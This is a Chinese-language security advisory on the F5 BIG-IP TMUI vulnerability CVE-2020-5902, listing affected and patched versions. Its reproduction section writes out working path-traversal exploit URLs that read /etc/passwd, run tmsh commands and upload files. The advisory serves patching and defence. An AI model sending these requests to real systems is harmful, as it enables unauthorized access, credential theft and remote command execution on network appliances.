F5 BIG-IP CVE-2020-5902 漏洞利用

0x00 漏洞概述

7月1日，F5发布公告，其流量管理用户接口（Traffic Management User Interface ，简称TMUI)，也称为配置实用程序（Configuration utility）。该系统存在一处RCE漏洞。CVE编号为CVE-2020-5902。

NCC的安全研究员发现，黑客已经开始利用F5 BIG-IP中的漏洞（CVE-2020-5902）发起攻击，旨在从被入侵的设备中窃取管理员密码。7月1日该漏洞公开后，网络安全专家立即发出有关紧急修补此漏洞的警报，因为任何成功的攻击都将使攻击者完全访问世界上最重要的IT网络。Warren称，在美国网络司令部的警告推文发布几小时后，他在BIG-IP蜜罐中检测到来自五个不同IP地址的恶意攻击。在共享的日志中，Warren指出了这些攻击的来源，并可以确认它们是恶意的。

0x01  风险等级

高

0x02 影响版本

    BIG-IP 15.x: 15.1.0/15.0.0

    BIG-IP 14.x: 14.1.0 ~ 14.1.2

    BIG-IP 13.x: 13.1.0 ~ 13.1.3

    BIG-IP 12.x: 12.1.0 ~ 12.1.5

    BIG-IP 11.x: 11.6.1 ~ 11.6.5

0x03 复现

文件读取

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

命令执行：

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin 查看admin用户

上传文件：

/tmui/login.jsp/..;//tmui/locallb/workspace/fileSave.jsp

0x04 修补建议

升级到以下版本

    BIG-IP 15.x: 15.1.0.4

    BIG-IP 14.x: 14.1.2.6

    BIG-IP 13.x: 13.1.3.4

    BIG-IP 12.x: 12.1.5.2

    BIG-IP 11.x: 11.6.5.2

参考链接：https://github.com/jas502n/CVE-2020-5902

长按下方图片关注我们：